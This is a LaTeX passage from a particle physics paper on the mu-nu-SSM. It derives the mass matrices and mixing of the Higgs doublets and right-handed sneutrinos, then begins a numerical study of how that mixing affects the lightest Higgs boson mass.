&&m_{\tilde \nu_{ij}^c}^2 \upsilon_{\nu_j^c}= -\Delta T_{\tilde \nu_{ij}^c} \upsilon_{\nu_j^c} + (A_\lambda \lambda)_i{\upsilon_d}{\upsilon_u} - {( A_\kappa \kappa)}_{ijk} \upsilon_{\nu_j^c} \upsilon_{\nu_k^c} + 2{\lambda _j}{\kappa _{ijk}}\upsilon_{\nu_k^c}{\upsilon_d}{\upsilon_u} \nonumber\\
&&\hspace{1.9cm} - \, 2{\kappa _{lim}}{\kappa _{ljk}} \upsilon_{\nu_m^c} \upsilon_{\nu_j^c} \upsilon_{\nu_k^c} - {\lambda _i}{\lambda _j}\upsilon_{\nu_j^c}(\upsilon_d^2 + \upsilon_u^2) , \quad(i=1,2,3)
\end{eqnarray}
where, as usual, $\tan\beta ={\upsilon_u}/{\upsilon_d}$. $\Delta T_{H_d}$, $\Delta T_{H_u}$, and $\Delta T_{\tilde \nu_{ij}^c} \upsilon_{\nu_j^c}$ come from one-loop corrections to the minimization conditions, which are taken in Appendix~\ref{app2}. Here, neglecting the small terms including $Y_{\nu}$ or $\upsilon_{\nu_i}$ in the Higgs sector, we do not give the minimization conditions of the potential about the left-handed sneutrino VEVs, which can be used to constrain $\upsilon_{\nu_i}$~\cite{meu-m,neu-zhang2}.
From the Higgs potential, one can derive the $8\times8$ mass matrices for the CP-even neutral scalars ${S'^T} = ({h_d},{h_u},{(\tilde \nu_i^c)^\Re},{({\tilde \nu_i})^\Re})$ and the CP-odd neutral scalars ${P'^T} = ({P_d},{P_u},{(\tilde \nu_i^c)^\Im},{({\tilde \nu_i})^\Im})$ in the unrotated basis. Ignoring the small terms including $Y_{\nu}$ or $\upsilon_{\nu_i}$, the $5\times5$ mass submatrix for Higgs
doublets and right-handed sneutrinos is basically decoupled from the $3\times3$ left-handed sneutrinos mass submatrix. The $3\times3$ left-handed sneutrino mass submatrix is $\Big(m_{\tilde L_{ij}}^2 + \frac{G^2}{4}(\upsilon_d^2 - \upsilon_u^2 )\delta_{ij}\Big)_{3\times3}$, which is dominated by the soft mass $m_{\tilde L_{ij}}^2$. Through the Higgs potential, the $5\times5$ mass submatrix for Higgs doublets and right-handed sneutrinos in the CP-even sector can be derived as
\begin{eqnarray}
M_S^2 = \left( {\begin{array}{*{20}{c}}
M_{H}^2 & M_{X}^2 \\
\Big(M_{X}^{2}\Big)^T & M_{R}^2 \\
\end{array}} \right),
\end{eqnarray}
where $M_{H}^2$ denotes the $2\times2$ mass submatrix for Higgs doublets, $M_{R}^2$ is the $3\times3$ mass submatrix for right-handed sneutrinos and $M_{X}^2$ represents the $2\times3$ mass submatrix for the mixing of Higgs doublets and right-handed sneutrinos.
In detail, the $2\times2$ mass submatrix $M_{H}^2$ can be written by
\begin{eqnarray}
M_H^2 = \left( {\begin{array}{*{20}{c}}
M_{h_d h_d}^2+\Delta_{11} & M_{h_d h_u}^2+\Delta_{12} \\
M_{h_d h_u}^2+\Delta_{12} & M_{h_u h_u}^2+\Delta_{22} \\
\end{array}} \right),
\end{eqnarray}
with the tree-level contributions as
\begin{eqnarray}
&&M_{h_d h_u}^2 = -\Big[m_A^2+\Big(1-4\lambda_i \lambda_i s_{_W}^2 c_{_W}^2/e^2 \Big)m_Z^2\Big] \sin \beta \cos \beta, \\
&&M_{h_d h_d}^2 = m_A^2 \sin^2 \beta+m_Z^2 \cos^2 \beta, \\
&&M_{h_u h_u}^2 = m_A^2 \cos^2 \beta+m_Z^2 \sin^2 \beta,
\end{eqnarray}
and the neutral pseudoscalar mass squared as
\begin{eqnarray}
m_A^2\simeq \frac{2}{{\sin2\beta}}\Big[(A_\lambda \lambda)_i \upsilon_{\nu_i^c}+ {\lambda _k}{\kappa _{ijk}}\upsilon_{\nu_i^c} \upsilon_{\nu_j^c}\Big] .
\end{eqnarray}
Comparing with the MSSM, $M_{h_d h_u}^2$ has an additional term $(4\lambda_i \lambda_i s_{W}^2 c_{W}^2/e^2 )m_Z^2 \sin \beta \cos \beta$, which can give a new contribution to the lightest Higgs boson mass. The radiative corrections $\Delta_{11}$, $\Delta_{12}$, and $\Delta_{22}$ from the third fermions ${f}={t},{b},{\tau}$ and their superpartners can be found in Ref.~\cite{ref-zhang2}, which agree with the results of the MSSM~\cite{Hi-1,Hi-2,Hi-3,Hi-4,Hi-5,Hi-6,Hi-7,Hi-8,Hi-alpha,Hi-9,Hi-10,Hi-11,Hi-12,Hi-13}. Here, the radiative corrections from the top quark and its superpartners include the two-loop leading-log effects, which can obviously affect the mass of the lightest Higgs boson.
Furthermore, the $2\times3$ mixing mass submatrix $M_{X}^2$ is
\begin{eqnarray}
M_X^2 = \left( {\begin{array}{*{20}{c}}
\Big(M_{h_d (\tilde \nu_i^c)^\Re}^2+\Delta_{1(2+i)}\Big)_{1\times3} \\
\Big(M_{h_u (\tilde \nu_i^c)^\Re}^2+\Delta_{2(2+i)}\Big)_{1\times3} \\
\end{array}} \right),
\end{eqnarray}
where
\begin{eqnarray}
&&M_{h_d (\tilde \nu_i^c)^\Re}^2 = \Big[ 2\lambda_i \lambda_j \upsilon_{\nu_j^c} \cot\beta - \Big( (A_\lambda \lambda)_i + 2 \lambda_k \kappa_{ijk} \upsilon_{\nu_j^c} \Big) \Big] \upsilon_u \,, \\
&&M_{h_u (\tilde \nu_i^c)^\Re}^2 = \Big[ 2\lambda_i \lambda_j \upsilon_{\nu_j^c} \tan\beta - \Big((A_\lambda \lambda)_i + 2 \lambda_k \kappa_{ijk}\upsilon_{\nu_j^c} \Big) \Big] \upsilon_d \,,
\end{eqnarray}
and the radiative corrections from the third fermions ${f}={t},{b},{\tau}$ and their superpartners are
\begin{eqnarray}
&&\Delta_{1(2+i)} = \lambda_i \upsilon_u \Delta_{1R} \,, \qquad \Delta_{2(2+i)} = \lambda_i \upsilon_d \Delta_{2R} \, ,\\
&&\Delta_{1R} = \frac{G_F}{2\sqrt{2}\pi^2} \Big\{ \frac{3{m_{t}^4}}{\sin^2\beta} {\mu (A_{t}-\mu\cot\beta)^2\over {\tan\beta (m_{\tilde{t}_1}^2-m_{\tilde{t}_2}^2)}^2}
g(m_{\tilde{t}_1}^2,m_{\tilde{t}_2}^2)
\nonumber\\
&&\hspace{1.3cm}
+ \frac{3{m_{b}^4}}{\cos^2\beta} {(-A_{b}+\mu\tan\beta)\over (m_{\tilde{b}_1}^2-m_{\tilde{b}_2}^2)} \Big[\log{m_{\tilde{b}_1}^2\over m_{\tilde{b}_2}^2} +{A_{b}(A_{b}-\mu\tan\beta)\over {(m_{\tilde{b}_1}^2-m_{\tilde{b}_2}^2)}}
g(m_{\tilde{b}_1}^2,m_{\tilde{b}_2}^2)\Big] \nonumber\\
&&\hspace{1.3cm}
+ \frac{{m_{\tau}^4}}{\cos^2\beta}{(-A_{\tau}+\mu\tan\beta)\over (m_{\tilde{\tau}_1}^2-m_{\tilde{\tau}_2}^2)} \Big[ \log{m_{\tilde{\tau}_1}^2\over m_{\tilde{\tau}_2}^2} +{A_{\tau}(A_{\tau}-\mu\tan\beta)\over {(m_{\tilde{\tau}_1}^2-m_{\tilde{\tau}_2}^2)}}
g(m_{\tilde{\tau}_1}^2,m_{\tilde{\tau}_2}^2)\Big] \Big\} \, ,\\
&&\Delta_{2R} = \frac{G_F}{2\sqrt{2}\pi^2} \Big\{ \frac{3{m_{t}^4}}{\sin^2\beta} {(-A_{t}+\mu\cot\beta)\over (m_{\tilde{t}_1}^2-m_{\tilde{t}_2}^2)}\Big[ \log{m_{\tilde{t}_1}^2\over m_{\tilde{t}_2}^2}
+{A_{t}(A_{t}-\mu\cot\beta)\over {(m_{\tilde{t}_1}^2-m_{\tilde{t}_2}^2)}}
g(m_{\tilde{t}_1}^2,m_{\tilde{t}_2}^2)\Big]
\nonumber\\
&&\hspace{1.3cm}+\frac{3{m_{b}^4}}{\cos^2\beta}{\mu (A_{b}-\mu\tan\beta)^2\over {\cot\beta(m_{\tilde{b}_1}^2-m_{\tilde{b}_2}^2)}^2}g(m_{\tilde{b}_1}^2,m_{\tilde{b}_2}^2) \nonumber\\
&&\hspace{1.3cm}
+ \frac{{m_{\tau}^4}}{\cos^2\beta}{\mu(A_{\tau}-\mu\tan\beta)^2\over {\cot\beta(m_{\tilde{\tau}_1}^2-m_{\tilde{\tau}_2}^2)}^2}
g(m_{\tilde{\tau}_1}^2,m_{\tilde{\tau}_2}^2) \Big\}\, ,
\end{eqnarray}
with $\mu=\lambda_i \upsilon_{\nu_i^c}$, $g(m_1^2,m_2^2)=2-{m_1^2+m_2^2\over m_1^2-m_2^2}\log{m_1^2\over m_2^2}$. Here, we can know that the radiative corrections to the mixing are proportional to the parameters $\lambda_i$.
Similarly, one can derive the $3\times3$ mass submatrix for the right-handed sneutrinos:
\begin{eqnarray}
M_R^2 = \left( {\begin{array}{*{20}{c}}
M_{(\tilde \nu_i^c)^\Re (\tilde \nu_j^c)^\Re }^2+\Delta_{(2+i)(2+j)} \\
\end{array}} \right)_{3\times3},
\end{eqnarray}
with
\begin{eqnarray}
&&M_{(\tilde \nu_i^c)^\Re (\tilde \nu_j^c)^\Re }^2 = m_{\tilde \nu_{ij}^c}^2 + 2 {(A_\kappa \kappa)}_{ijk} \upsilon_{\nu_k^c} - 2\lambda_k \kappa_{ijk} \upsilon_d \upsilon_u + \lambda_i \lambda_j ( \upsilon_d^2 + \upsilon_u^2) \nonumber\\
&&\hspace{2.5cm} +\:(2\kappa_{ijk}\kappa_{lmk}+4\kappa_{ilk}\kappa_{jmk}) \upsilon_{\nu_l^c}\upsilon_{\nu_m^c} \,,
\end{eqnarray}
and the corrections from the third fermions and their superpartners are
\begin{eqnarray}
&&\Delta_{(2+i)(2+j)} = \lambda_i \lambda_j \Delta_{RR} \,, \\
&&\Delta_{RR} = \frac{G_F}{2\sqrt{2}\pi^2} \Big\{ \frac{3{m_{t}^4}}{\sin^2\beta} {\upsilon_d^2 (A_{t}-\mu\cot\beta)^2\over {(m_{\tilde{t}_1}^2-m_{\tilde{t}_2}^2)}^2}
g(m_{\tilde{t}_1}^2,m_{\tilde{t}_2}^2)
\nonumber\\
&&\hspace{1.45cm}
+\frac{3{m_{b}^4}}{\cos^2\beta}{\upsilon_u^2 (A_{b}-\mu\tan\beta)^2\over {(m_{\tilde{b}_1}^2-m_{\tilde{b}_2}^2)}^2}g(m_{\tilde{b}_1}^2,m_{\tilde{b}_2}^2) \nonumber\\
&&\hspace{1.45cm}
+ \frac{{m_{\tau}^4}}{\cos^2\beta}{\upsilon_u^2 (A_{\tau}-\mu\tan\beta)^2\over {(m_{\tilde{\tau}_1}^2-m_{\tilde{\tau}_2}^2)}^2}
g(m_{\tilde{\tau}_1}^2,m_{\tilde{\tau}_2}^2) \Big\}\, .
\end{eqnarray}
Here, the radiative corrections to the mass submatrix for right-handed sneutrinos are proportional to $\lambda_i\lambda_j$.
\section{Diagonalization of the mass matrix\label{sec3}}
\indent
The mass squared matrix $M_{H}^2$ which contains the radiative corrections can be diagonalized as
\begin{eqnarray}
U_H^T M_{H}^2 U_H = {\rm{diag}} \Big(m_{H_1}^2,m_{H_2}^2\Big),
\end{eqnarray}
by the $2\times2$ unitary matrix $U_H$,
\begin{eqnarray}
U_H=
\left(\begin{array}{*{20}{c}}
-\sin \alpha & \cos \alpha\\
\cos \alpha & \sin \alpha
\end{array}\right).
\end{eqnarray}
Here, the neutral doubletlike Higgs mass squared eigenvalues $m_{{H_{1,2}}}^2$ can be derived,
\begin{eqnarray}
m_{{H_{1,2}}}^2={1\over 2}\Big[{\rm{Tr}}M_{H}^2 \mp\sqrt{({{\rm{Tr}}M_{H}^2})^2-4{\rm{Det}}M_{H}^2}\Big],
\end{eqnarray}
where ${\rm{Tr}}M_{H}^2={M_{H}^2}_{11}+{M_{H}^2}_{22}$, ${\rm{Det}}{M_{H}^2} = {M_{H}^2}_{11}{M_{H}^2}_{22}-({M_{H}^2}_{12})^2$.
The mixing angle $\alpha$ can be determined by~\cite{Hi-alpha}
\begin{eqnarray}
&&\sin 2\alpha =\frac{2{M_{H}^2}_{12}}{\sqrt{({\rm{Tr}}{M_{H}^2})^2-4{\rm{Det}}{M_{H}^2}}},\nonumber\\
&&\cos 2\alpha =\frac{{M_{H}^2}_{11}-{M_{H}^2}_{22}}{\sqrt{({\rm{Tr}}{M_{H}^2})^2-4{\rm{Det}}{M_{H}^2}}},
\end{eqnarray}
which reduce to $-\sin 2\beta$ and $-\cos 2\beta$, respectively, in the large $m_A$ limit. The convention is that $\pi/4\leq\beta<\pi/2$ for $\tan \beta\geq1$, while $-\pi/2<\alpha<0$. In the large $m_A$ limit, $\alpha=-\pi/2+\beta$.
In the large $m_A$ limit, the light neutral doubletlike Higgs mass is approximately given as
\begin{eqnarray}
m_{H_{1}}^2 \simeq m_Z^2 \cos^2 2\beta + \frac{2 \lambda_i \lambda_i s_{_W}^2 c_{_W}^2}{ e^2} m_Z^2 \sin^2 2\beta+\bigtriangleup m_{H_{1}}^2.
\label{mH1-app}
\end{eqnarray}
Comparing with the MSSM, the $\mu\nu{\rm SSM}$ gets an additional term $\frac{2 \lambda_i \lambda_i s_{_W}^2 c_{_W}^2}{ e^2} m_Z^2 \sin^2 2\beta$~\cite{mnSSM1}.
Here, the radiative corrections $\bigtriangleup m_{H_{1}}^2$ can be computed more precisely by some public tools, for example, FeynHiggs~\cite{FeynHiggs-1,FeynHiggs-2,FeynHiggs-3,FeynHiggs-4,FeynHiggs-5,FeynHiggs-6,FeynHiggs-7,FeynHiggs-8}, SOFTSUSY~\cite{SOFTSUSY-1,SOFTSUSY-2,SOFTSUSY-3}, SPheno~\cite{SPheno-1,SPheno-2}, and so on. In the following numerical section, we will use the FeynHiggs-2.13.0 to calculate the radiative corrections for the Higgs boson mass about the MSSM part.
To further deal with the mass submatrix $M_{R}^2$ and $M_{X}^2$, in the following we choose the usual minimal scenario for the parameter space:
\begin{eqnarray}
&&\lambda _i = \lambda , \quad
({A_\lambda }\lambda )_i = {A_\lambda }\lambda, \quad
\upsilon_{\nu_i^c}=\upsilon_{\nu^c},
\nonumber\\
&&{\kappa _{ijk}} = \kappa {\delta _{ij}}{\delta _{jk}}, \quad
{({A_\kappa }\kappa )_{ijk}} = {A_\kappa }\kappa {\delta _{ij}}{\delta _{jk}}, \quad
m_{\tilde \nu_{ij}^c}^2 = m_{{{\tilde \nu_i}^c}}^2{\delta _{ij}},
\label{MSPS}
\end{eqnarray}
Then, the $3\times3$ mass submatrix for CP-even right-handed sneutrinos can be simplified as
\begin{eqnarray}
M_R^2 = \left( {\begin{array}{*{20}{c}}
X_{R} & y_{_R} & y_{_R} \\
y_{_R} & X_{R} & y_{_R} \\
y_{_R} & y_{_R} & X_{R} \\
\end{array}} \right),
\end{eqnarray}
with
\begin{eqnarray}
&&X_{R} = (A_\kappa+4\kappa\upsilon_{\nu^c})\kappa\upsilon_{\nu^c} +A_\lambda \lambda \upsilon_d \upsilon_u/\upsilon_{\nu^c} + \lambda^2 \Delta_{RR}\,,\\
&&y_{_R} = \lambda^2 ( \upsilon^2+\Delta_{RR})\,,
\end{eqnarray}
where $\upsilon^2=\upsilon_d^2+\upsilon_u^2$.
Here the radiative corrections keep the dominating contributions which are proportional to $m_f^4$ ($f=t,b,\tau$).
Through the $3\times3$ unitary matrix $U_R$,
\begin{eqnarray}
U_R=
\left(\begin{array}{*{20}{c}}
\frac{1}{\sqrt{3}} & 0 & -\frac{2}{\sqrt{6}} \\
\frac{1}{\sqrt{3}} & -\frac{1}{\sqrt{2}} & \frac{1}{\sqrt{6}} \\
\frac{1}{\sqrt{3}} & \frac{1}{\sqrt{2}} & \frac{1}{\sqrt{6}}
\end{array}\right),
\end{eqnarray}
the mass squared matrix $M_{R}^2$ can be diagonalized as
\begin{eqnarray}
U_R^T M_{R}^2 U_R = {\rm{diag}} \Big(m_{R_1}^2,m_{R_2}^2,m_{R_3}^2\Big),
\end{eqnarray}
with
\begin{eqnarray}
\label{mR1}
&&m_{R_1}^2=X_{R}+2y_{_R}= (A_\kappa+4\kappa\upsilon_{\nu^c})\kappa\upsilon_{\nu^c} +A_\lambda \lambda \upsilon_d \upsilon_u/\upsilon_{\nu^c} + \lambda^2 (2 \upsilon^2+3\Delta_{RR}),\\
&&m_{R_2}^2=m_{R_3}^2=X_{R}-y_{_R}= (A_\kappa+4\kappa\upsilon_{\nu^c})\kappa\upsilon_{\nu^c} +A_\lambda \lambda \upsilon_d \upsilon_u/\upsilon_{\nu^c} - \lambda^2 \upsilon^2.
\end{eqnarray}
The radiative corrections are proportional to $\lambda^2$, which will be tamped down as $\lambda \sim \mathcal{O}(0.1)$. Then the masses squared of the CP-even right-handed sneutrinos can be approximated by
\begin{eqnarray}
m_{S_R}^2 \approx m_{R_1}^2 \approx m_{R_2}^2 = m_{R_3}^2 \approx (A_\kappa+4\kappa\upsilon_{\nu^c})\kappa\upsilon_{\nu^c} +A_\lambda \lambda \upsilon_d \upsilon_u/\upsilon_{\nu^c}\, .
\label{mSR}
\end{eqnarray}
Due to $\upsilon_{\nu^c} \gg \upsilon_{u,d}$, the main contribution to the mass squared is the first term as $\kappa$ is large. Additionally, the masses squared of the CP-odd right-handed sneutrinos $m_{P_R}^2$ can be approximated as
\begin{eqnarray}
m_{P_R}^2 \approx -3A_\kappa\kappa\upsilon_{\nu^c}+(4\kappa+A_\lambda /\upsilon_{\nu^c})\lambda \upsilon_d \upsilon_u\, ,
\label{mPR}
\end{eqnarray}
where the first term is the leading contribution. Therefore, one can use the approximate relation,
\begin{eqnarray}
-4\kappa\upsilon_{\nu^c}\lesssim A_\kappa \lesssim 0\, ,
\label{tachyon}
\end{eqnarray}
to avoid the tachyons.
In the minimal scenario for the parameter space presented in Eq.~(\ref{MSPS}), the $2\times3$ mixing mass submatrix $M_{X}^2$ is simplified as
\begin{eqnarray}
M_X^2 = \left( {\begin{array}{*{20}{c}}
M_{X_1}^2 & M_{X_1}^2 & M_{X_1}^2 \\
M_{X_2}^2 & M_{X_2}^2 & M_{X_2}^2 \\
\end{array}} \right),
\end{eqnarray}
where
\begin{eqnarray}
&&M_{X_1}^2 = \lambda \upsilon \sin\beta \Big[ 2\upsilon_{\nu^c} ( 3\lambda \cot\beta - \kappa )- A_\lambda + \Delta_{1R} \Big] \,, \\
&&M_{X_2}^2 = \lambda \upsilon \cos\beta \Big[ 2\upsilon_{\nu^c} ( 3\lambda \tan\beta - \kappa )- A_\lambda + \Delta_{2R} \Big] \,.
\end{eqnarray}
Then, we do the calculation:
\begin{eqnarray}
\left( {\begin{array}{*{20}{c}}
U_{H}^T & 0 \\
0 & U_{R}^T \\
\end{array}} \right)
\left( {\begin{array}{*{20}{c}}
M_{H}^2 & M_{X}^2 \\
\Big(M_{X}^{2}\Big)^T & M_{R}^2 \\
\end{array}} \right)
\left( {\begin{array}{*{20}{c}}
U_{H} & 0 \\
0 & U_{R} \\
\end{array}} \right)
= {\cal H}
\oplus \left( {\begin{array}{*{20}{c}}
m_{R_2}^2 & 0 \\
0 & m_{R_3}^2 \\
\end{array}} \right),
\end{eqnarray}
with
\begin{eqnarray}
{\cal H}= \left( {\begin{array}{*{20}{c}}
m_{H_1}^2 & 0 & A_{X_1}^2 \\
0 & m_{H_2}^2 & A_{X_2}^2 \\
A_{X_1}^2 & A_{X_2}^2 & m_{R_1}^2 \\
\end{array}} \right),
\end{eqnarray}
where
\begin{eqnarray}
&&A_{X_1}^2 = \sqrt{3} (-M_{X_1}^2 \sin\alpha + M_{X_2}^2 \cos\alpha) \,, \\
&&A_{X_2}^2 = \sqrt{3} (M_{X_1}^2 \cos\alpha + M_{X_2}^2 \sin\alpha) \,.
\end{eqnarray}
In the large $m_A$ limit, $\alpha=-\pi/2+\beta$. Then, one can have the following approximate expressions:
\begin{eqnarray}
\label{AX1}
&&A_{X_1}^2 \simeq \sqrt{3} \lambda \upsilon \sin2\beta \Big[ 2\upsilon_{\nu^c} \Big( \frac{3\lambda}{\sin2\beta} - \kappa \Big)- A_\lambda + \frac{1}{2} (\Delta_{1R} + \Delta_{2R}) \Big] \,, \\
\label{AX2}
&&A_{X_2}^2 \simeq \sqrt{3} \lambda \upsilon \Big[ ( 2\kappa \upsilon_{\nu^c}+ A_\lambda ) \cos2\beta + \Delta_{1R}\sin^2\beta - \Delta_{2R}\cos^2\beta \Big] \,.
\end{eqnarray}
If $A_{X_1}^2=0$, the mixing of Higgs doublets and right-handed sneutrinos will not affect the lightest Higgs boson mass~\cite{mnSSM1}; namely, one can adopt the relation
\begin{eqnarray}
A_\lambda = 2\upsilon_{\nu^c} \Big( \frac{3\lambda}{\sin2\beta} - \kappa \Big) + \frac{1}{2} (\Delta_{1R} + \Delta_{2R}) \,,
\label{Alambda}
\end{eqnarray}
which is analogous to the NMSSM~\cite{ref-NMSSM1,ref-NMSSM2}. To relax the conditions, if $A_\lambda$ is around the value in Eq.~(\ref{Alambda}), the contribution to the lightest Higgs boson mass from the mixing could also be neglected approximately. In the case $A_{X_1}^2\approx0$, the mass of the lightest Higgs boson is just $m_{H_1}$, which shows, approximately, in Eq.~(\ref{mH1-app}).
If $A_{X_1}^2\neq0$, we need to diagonalize the $3\times3$ mass matrix ${\cal H}$ further:
\begin{eqnarray}
U_X^T {\cal H} U_X = {\rm{diag}} \Big(m_h^2,m_H^2,m_{S_3}^2\Big),
\end{eqnarray}
where the eigenvalues $m_h^2,m_H^2,m_{S_3}^2$ and the unitary matrix $U_X$ can be concretely seen in Appendix~\ref{app3}. Then, the lightest Higgs boson mass is exactly $m_h^2$. In the large $m_A$ limit, $m_{H_2}\simeq m_A$, one can have the lightest Higgs boson mass squared approximately as
\begin{eqnarray}
m_h^2 \simeq \frac{1}{2} \Big\{m_{H_1}^2+m_{R_1}^2-\frac{ (A_{X_2}^2)^2}{m_{H_2}^2} -\sqrt{\Big[m_{R_1}^2-m_{H_1}^2-\frac{(A_{X_2}^2)^2}{m_{H_2}^2}\Big]^2 +4(A_{X_1}^2)^2}\Big\}.
\label{mh-app}
\end{eqnarray}
The approximate expression works well, which can be easily checked in the numerical calculation. When $m_{H_2}$ and $m_{R_1}$ are all large, Eq.~(\ref{mh-app}) could be approximated by
\begin{eqnarray}
m_h^2 \approx m_{H_1}^2-\frac{(A_{X_1}^2)^2}{m_{R_1}^2} = m_{H_1}^2 \Big[1-\frac{(A_{X_1}^2)^2}{m_{R_1}^2 m_{H_1}^2}\Big].
\label{mh-app1}
\end{eqnarray}
In the numerical analysis, we can define the quantity
\begin{eqnarray}
\xi_h = \frac{(A_{X_1}^2)^2}{m_{R_1}^2 m_{H_1}^2}\,
\label{xih}
\end{eqnarray}
to analyze how the mixing affects the mass of the lightest Higgs boson.
One can diagonalize the $5\times5$ mass submatrix for Higgs doublets and right-handed sneutrinos in the CP-even sector:
\begin{eqnarray}
R_S^T M_{S}^2 R_S = {\rm{diag}} \Big(m_{S_1}^2,m_{S_2}^2,m_{S_3}^2,m_{S_4}^2,m_{S_5}^2\Big),
\end{eqnarray}
with $m_{S_1}=m_h,\:m_{S_2}=m_H,\:m_{S_4}=m_{R_2}=m_{S_5}=m_{R_3}$, and the $5\times5$ unitary matrix $R_S$
\begin{eqnarray}
R_S=
\left( {\begin{array}{*{20}{c}}
U_{H} & 0 \\
0 & U_{R} \\
\end{array}} \right)
\left( {\begin{array}{*{20}{c}}
U_X & 0 \\
0 & I_{2\times2} \\
\end{array}} \right),
\end{eqnarray}
where $I_{2\times2}$ denotes the ${2\times2}$ unit matrix.
\section{Numerical analysis\label{sec-num}}
\indent
In this section, we will do the numerical analysis for the masses of the Higgs bosons. First, we choose the values of the parameter space.
For the relevant parameters in the SM, we choose
\begin{eqnarray}
&&\alpha_s(m_{Z})=0.118,\qquad m_{Z}=91.188\;{\rm GeV}, \qquad m_{W}=80.385\;{\rm GeV},
\nonumber\\
&&m_t=173.2\;{\rm GeV},\qquad m_b=4.66\;{\rm GeV}, \qquad\: m_{\tau}=1.777\;{\rm GeV}.
\end{eqnarray}
The other SM parameters can be seen in Ref.~\cite{PDG} from the Particle Data Group.
Here, we choose a suitable ${A_{\kappa}}=-500\;{\rm GeV}$ to avoid the tachyons easily, through Eq.~(\ref{tachyon}). Considering the direct search for supersymmetric particles~\cite{PDG}, we could reasonably choose $M_2=2M_1=800\;{\rm GeV}$, $M_3=2\;{\rm TeV}$, $m_{{\tilde Q}_3}=m_{{\tilde U}_3}=m_{{\tilde D}_3}=2\;{\rm TeV}$, $m_{{\tilde L}_{3}}=m_{{\tilde E}_{3}}=1\;{\rm TeV}$, $A_{b}=A_{\tau}=1\;{\rm TeV}$, and $A_{t}=2.5\;{\rm TeV}$ for simplicity. As key parameters, $m_{{\tilde Q}_3}$, $m_{{\tilde U}_3}$, $A_t$ and the gaugino mass parameters affect the radiative corrections to the lightest Higgs mass. Therefore, one can take the proper values for $m_{{\tilde Q}_3}$, $m_{{\tilde U}_3}$, $A_t$ and the gaugino mass parameters to keep the lightest Higgs mass around $125$ GeV.
In the following, we will analyze how the mixing of Higgs doublets and right-handed sneutrinos affects the lightest Higgs boson mass. Through $A_{X_1}^2$ in Eq.~(\ref{AX1}), one knows that the parameters which affect the lightest Higgs boson mass from the mixing will be $\lambda,\,\tan\beta,\,\kappa,\,A_\lambda$, and $\upsilon_{\nu^c}$. Here, we specify that the parameter $\mu=3\lambda\upsilon_{\nu^c}$, which is dominated by the parameters $\lambda$ and $\upsilon_{\nu^c}$.
\begin{figure}
\setlength{\unitlength}{1mm}
\centering
\begin{minipage}[c]{0.45\textwidth}
\includegraphics[width=2.9in]{fig1lam-a.eps}
\end{minipage}%
\begin{minipage}[c]{0.45\textwidth}
\includegraphics[width=2.9in]{fig1lam-b.eps}
\end{minipage}
\caption[]{(a) $m_h$ varies with $\lambda$, the solid line and dash-dot line denote $m_h$ and $m_{H_1}$ as $\tan\beta=20$, the dash line and dot line denote $m_h$ and $m_{H_1}$ as $\tan\beta=6$. (b) $\xi_h$ varies with $\lambda$, the solid line and dash line represent as $\tan\beta=20$ and $\tan\beta=6$, respectively. When $\kappa=0.4$, $A_\lambda=500\;{\rm GeV}$ and $\upsilon_{\nu^c}=2\;{\rm TeV}$.}
\label{fig1}
\end{figure}
When $\kappa=0.4$, $A_\lambda=500\;{\rm GeV}$, and $\upsilon_{\nu^c}=2\;{\rm TeV}$, we plot the lightest Higgs boson mass $m_h$, varying with the parameter $\lambda$ in Fig.~\ref{fig1}(a), where the solid line and dash-dot line denote $m_h$ and $m_{H_1}$ as $\tan\beta=20$, the dash line and dot line denote $m_h$ and $m_{H_1}$ as $\tan\beta=6$, respectively. The mass $m_{H_1}$ denotes the lightest Higgs boson mass if we do not consider the mixing of Higgs doublets and right-handed sneutrinos, and the mass $m_h$ is exactly the lightest Higgs boson mass considering the mixing. The numerical results indicate that the mixing could have significant effects on the lightest Higgs boson mass, as the parameter $\lambda$ is large. With an increase of $\lambda$, the lightest Higgs boson mass $m_h$ drops down quickly, which deviates from the mass $m_{H_1}$. For large $\tan\beta$, the lightest Higgs boson mass $m_h$ decreases more quickly with increasing $\lambda$.
To see the reason more clearly, we also plot the quantity $\xi_h$, varying with $\lambda$ in Fig.~\ref{fig1}(b), where the solid line and dash line, respectively, represent as $\tan\beta=20$ and $\tan\beta=6$. The quantity $\xi_h$ is defined in Eq.~(\ref{xih}) to quantify the effect on the lightest Higgs boson mass from the mixing of Higgs doublets and right-handed sneutrinos. The figure shows that $\xi_h$ increases quickly with an increase of $\lambda$, and $\xi_h$ for large $\tan\beta$ is larger than it is for small $\tan\beta$. When $\lambda$ is small, $\xi_h$ is also small, and then $m_h$ is close to $m_{H_1}$ because $A_{X_1}^2$ in Eq.~(\ref{AX1}) is in proportion to the parameter $\lambda$. Additionally, in this parameter space, $m_H \approx m_A \approx 2.2\;{\rm TeV}$, $m_{S_R}\approx 1.5\;{\rm TeV}$, and $m_{P_R}\approx 1.1\;{\rm TeV}$, for $\tan\beta=6$ and $\lambda=0.1$. Therefore, for $m_A \sim\mathcal{O}({\rm TeV})$, we can believe that the parameter space is in the large $m_A$ limit, and accordingly the approximate expressions Eq.~(\ref{mH1-app}) and Eq.~(\ref{mh-app}) will work well. Meanwhile $m_{S_R} \sim\mathcal{O}({\rm TeV})$, and the approximate expression Eq.~(\ref{mh-app1}) is also consistent with the exact one.
\begin{figure}
\setlength{\unitlength}{1mm}
\centering
\begin{minipage}[c]{0.45\textwidth}
\includegraphics[width=2.9in]{fig2k-a.eps}
\end{minipage}%
\begin{minipage}[c]{0.45\textwidth}
\includegraphics[width=2.9in]{fig2k-b.eps}
\end{minipage}
\caption[]{(a) $m_h$ varies with $\kappa$, the solid line and dash-dot line denote $m_h$ and $m_{H_1}$ as $\tan\beta=20$, the dash line and dot line denote $m_h$ and $m_{H_1}$ as $\tan\beta=6$. (b) $\xi_h$ varies with $\kappa$, the solid line and dash line represent as $\tan\beta=20$ and $\tan\beta=6$, respectively. When $\lambda=0.1$, $A_\lambda=500\;{\rm GeV}$ and $\upsilon_{\nu^c}=2\;{\rm TeV}$.}
\label{fig2}
\end{figure}
